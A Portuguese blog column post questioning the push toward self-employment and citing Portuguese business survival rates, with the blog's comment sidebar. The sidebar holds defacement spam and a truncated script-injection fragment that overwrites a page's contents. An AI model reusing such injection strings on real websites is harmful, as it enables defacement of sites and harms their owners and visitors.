Dear Job @ 10:52

Ter, 06/03/12

“Está cansado do seu chefe? Está farto de procurar emprego e não consegue? Acha que tem demasiado talento e não o consegue implementar na sua empresa?  Ganha pouco? Então chegou a altura e ter o seu próprio negócio e de ser Patrão de si próprio.”

Este parece um anúncio de uma grande multinacional há uns anos a recrutar talentos. Mas na realidade, com este tipo de discurso, muitas pessoas são aliciadas (inclusive pelo Governo) para criarem o seu próprio trabalho e se lançarem por conta própria. Para ajudar “à propaganda”, estão constantemente a surgir entrevistas e reportagens de pessoas que falam do seu sucesso e de como é bom e acessível ser empreendedor.

Mas convém ver outras notícias: têm vindo para a comunicação social também muitas noticias que nos dão conta de empreendedores que estão a passar dificuldades, pois os dados do INE dizem que em Portugal "Cerca de 73% das empresas sobrevivem ao primeiro ano e só 54% superam a barreira dos dois."
Será então o empreendedorismo uma boa decisão? Depende do seu perfil. Se tomar a decisão errada, em vez de uma porta para a liberdade é uma porta para o inferno.

No próximo Dear Job vamos falar sobre factores que podem influenciar a sua escolha entre decidir trabalhar por conta própria ou não.


Tags:

De
 
Nome

Url

Email

Guardar Dados?

Ainda não tem um Blog no SAPO? Crie já um. É grátis.

Comentário

Máximo de 4300 caracteres



Copiar caracteres

 



O dono deste Blog optou por gravar os IPs de quem comenta os seus posts.

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO